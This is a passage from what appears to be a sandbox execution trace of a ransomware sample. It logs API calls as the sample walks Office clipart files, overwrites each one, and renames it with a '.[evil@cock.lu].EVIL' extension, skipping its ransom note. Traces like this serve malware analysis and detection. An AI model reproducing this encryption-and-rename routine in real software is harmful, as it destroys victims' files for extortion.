Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0281640.wmf.[evil@cock.lu].evil")) returned 1 [0153.817] ??_V@YAXPEAX@Z () returned 0x1 [0153.820] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0281640.WMF", dwFileAttributes=0x200) returned 0 [0153.820] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.820] wcsstr (_Str="J0282126.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.820] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF") returned 69 [0153.820] wcscmp (_String1="J0282126.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.820] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0282126.WMF") returned 0x0 [0153.820] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF") returned 0x45 [0153.820] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282126.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.822] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3c9e, lpOverlapped=0x0) returned 1 [0153.825] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.825] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.825] _errno () returned 0x84b1160840 [0153.825] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.825] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x3ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3ca0, lpOverlapped=0x0) returned 1 [0153.825] CloseHandle (hObject=0x1a8) returned 1 [0153.826] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.826] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.826] __uncaught_exception () returned 0x84b1160800 [0153.826] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.826] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282126.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282126.wmf.[evil@cock.lu].evil")) returned 1 [0153.827] ??_V@YAXPEAX@Z () returned 0x1 [0153.830] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282126.WMF", dwFileAttributes=0x200) returned 0 [0153.830] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.830] wcsstr (_Str="J0282928.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.830] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF") returned 69 [0153.830] wcscmp (_String1="J0282928.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0282928.WMF") returned 0x0 [0153.830] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF") returned 0x45 [0153.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282928.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.833] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8166, lpOverlapped=0x0) returned 1 [0153.835] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.835] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.835] _errno () returned 0x84b1160840 [0153.835] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.836] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x8180, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8180, lpOverlapped=0x0) returned 1 [0153.836] CloseHandle (hObject=0x1a8) returned 1 [0153.836] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.836] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.836] __uncaught_exception () returned 0x84b1160800 [0153.836] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.836] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282928.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282928.wmf.[evil@cock.lu].evil")) returned 1 [0153.837] ??_V@YAXPEAX@Z () returned 0x1 [0153.840] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282928.WMF", dwFileAttributes=0x200) returned 0 [0153.840] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.841] wcsstr (_Str="J0282932.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.841] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF") returned 69 [0153.841] wcscmp (_String1="J0282932.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.841] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0282932.WMF") returned 0x0 [0153.841] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF") returned 0x45 [0153.841] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282932.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.843] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3700, lpOverlapped=0x0) returned 1 [0153.845] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.845] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.845] _errno () returned 0x84b1160840 [0153.846] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.846] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x3720, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3720, lpOverlapped=0x0) returned 1 [0153.846] CloseHandle (hObject=0x1a8) returned 1 [0153.846] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.846] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.846] __uncaught_exception () returned 0x84b1160800 [0153.846] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.847] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282932.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0282932.wmf.[evil@cock.lu].evil")) returned 1 [0153.848] ??_V@YAXPEAX@Z () returned 0x1 [0153.851] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0282932.WMF", dwFileAttributes=0x200) returned 0 [0153.851] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.851] wcsstr (_Str="J0285462.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.851] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF") returned 69 [0153.851] wcscmp (_String1="J0285462.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.851] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0285462.WMF") returned 0x0 [0153.851] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF") returned 0x45 [0153.852] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285462.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.854] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x388a, lpOverlapped=0x0) returned 1 [0153.857] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.857] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.857] _errno () returned 0x84b1160840 [0153.857] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.857] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x38a0, lpOverlapped=0x0) returned 1 [0153.857] CloseHandle (hObject=0x1a8) returned 1 [0153.858] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.858] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.858] __uncaught_exception () returned 0x84b1160800 [0153.858] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.858] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285462.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285462.wmf.[evil@cock.lu].evil")) returned 1 [0153.859] ??_V@YAXPEAX@Z () returned 0x1 [0153.863] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285462.WMF", dwFileAttributes=0x200) returned 0 [0153.863] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.863] wcsstr (_Str="J0285484.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.863] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF") returned 69 [0153.863] wcscmp (_String1="J0285484.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.863] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0285484.WMF") returned 0x0 [0153.863] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF") returned 0x45 [0153.863] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285484.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.866] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2440, lpOverlapped=0x0) returned 1 [0153.869] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.869] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.869] _errno () returned 0x84b1160840 [0153.869] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.869] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2460, lpOverlapped=0x0) returned 1 [0153.869] CloseHandle (hObject=0x1a8) returned 1 [0153.869] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.869] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.870] __uncaught_exception () returned 0x84b1160800 [0153.870] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.870] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285484.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285484.wmf.[evil@cock.lu].evil")) returned 1 [0153.871] ??_V@YAXPEAX@Z () returned 0x1 [0153.874] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285484.WMF", dwFileAttributes=0x200) returned 0 [0153.874] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.874] wcsstr (_Str="J0285780.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.874] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF") returned 69 [0153.874] wcscmp (_String1="J0285780.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.874] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0285780.WMF") returned 0x0 [0153.874] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF") returned 0x45 [0153.874] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285780.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.877] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x795c, lpOverlapped=0x0) returned 1 [0153.880] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.880] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.880] _errno () returned 0x84b1160840 [0153.880] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.880] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x7960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7960, lpOverlapped=0x0) returned 1 [0153.880] CloseHandle (hObject=0x1a8) returned 1 [0153.880] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.881] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.881] __uncaught_exception () returned 0x84b1160800 [0153.881] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.881] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285780.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285780.wmf.[evil@cock.lu].evil")) returned 1 [0153.882] ??_V@YAXPEAX@Z () returned 0x1 [0153.885] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285780.WMF", dwFileAttributes=0x200) returned 0 [0153.885] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.885] wcsstr (_Str="J0285782.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.885] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF") returned 69 [0153.885] wcscmp (_String1="J0285782.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.885] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0285782.WMF") returned 0x0 [0153.885] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF") returned 0x45 [0153.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285782.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.888] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x523e, lpOverlapped=0x0) returned 1 [0153.891] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.891] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.891] _errno () returned 0x84b1160840 [0153.891] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.891] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x5240, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5240, lpOverlapped=0x0) returned 1 [0153.892] CloseHandle (hObject=0x1a8) returned 1 [0153.892] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.892] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.892] __uncaught_exception () returned 0x84b1160800 [0153.892] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.892] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285782.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285782.wmf.[evil@cock.lu].evil")) returned 1 [0153.893] ??_V@YAXPEAX@Z () returned 0x1 [0153.897] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285782.WMF", dwFileAttributes=0x200) returned 0 [0153.897] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.897] wcsstr (_Str="J0285792.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0153.897] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF") returned 69 [0153.897] wcscmp (_String1="J0285792.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0153.897] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0285792.WMF") returned 0x0 [0153.897] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF") returned 0x45 [0153.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285792.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0153.899] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2eb4, lpOverlapped=0x0) returned 1 [0153.907] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.907] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0153.907] _errno () returned 0x84b1160840 [0153.907] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.907] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x2ec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2ec0, lpOverlapped=0x0) returned 1 [0153.907] CloseHandle (hObject=0x1a8) returned 1 [0153.907] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0153.908] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0153.908] __uncaught_exception () returned 0x84b1160800 [0153.908] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0153.908] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285792.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285792.wmf.[evil@cock.lu].evil")) returned 1 [0153.909] ??_V@YAXPEAX@Z () returned 0x1 [0153.913] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285792.WMF", dwFileAttributes=0x200) returned 0 [0153.913] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0153.913] wcsstr (_Str="J0285796.WMF", 